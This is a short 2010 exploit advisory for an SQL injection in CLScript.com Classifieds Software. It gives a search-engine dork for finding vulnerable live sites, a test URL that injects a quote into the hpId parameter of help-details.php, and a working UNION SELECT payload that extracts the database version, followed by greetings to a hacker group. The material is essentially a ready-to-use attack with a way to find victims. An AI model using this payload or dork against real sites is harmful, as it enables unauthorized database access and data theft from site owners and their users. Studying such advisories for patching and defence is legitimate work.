# Exploit Title: CLScript.com Classifieds Software SQL Injection Vunerability # Date: 27-4-2010 # Author: 41.w4r10r # Vendor Link : http://www.clscript.com/ # Version: Web Application # Tested on: Apcahe/Unix # CVE : [if exists] # Dork : intext:"Powered by CLscript.com" # Code : --------------------------------------------------------------------------------------- ############################################################################ #Greetz to all Andhra Hackers and ICW Memebers[Indian Cyber Warriors] #Thanks: SaiSatish,FB1H2S,Godwin_Austin,Micr0,Mannu,Harin,Jappy,Dark_Blue,Hoodlum #Shoutz: hg_H@x0r,r45c4l,Yash,Hackuin,unn4m3d #Catch us at www.andhrahackers.com or www.teamicw.in ############################################################################ Exploited Link : 1) http://example.com/help-details.php?hpId=-38' Live Demo : 1) http://example.com/help-details.php?hpId=-38+union+select+all+1,version(),3,4,5,6,7-- #41.w4r10r mailto:41.w4r10r@andhrahackers.com